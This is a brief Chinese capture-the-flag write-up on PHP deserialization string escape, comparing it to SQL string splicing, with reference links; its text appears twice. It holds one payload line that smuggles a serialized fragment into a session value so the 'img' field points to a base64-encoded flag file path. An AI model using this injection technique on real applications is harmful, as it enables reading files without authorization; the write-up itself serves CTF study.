原理
反序列化字符串逃逸
解题过程
跟sql拼接差不多
_SESSION['imgflagphp']=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
参考文章:https://blog.csdn.net/weixin_52585514/article/details/124291588
https://xz.aliyun.com/t/9895
反序列化字符串逃逸
跟sql拼接差不多
_SESSION['imgflagphp']=;s:1:"1";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
参考文章:https://blog.csdn.net/weixin_52585514/article/details/124291588
https://xz.aliyun.com/t/9895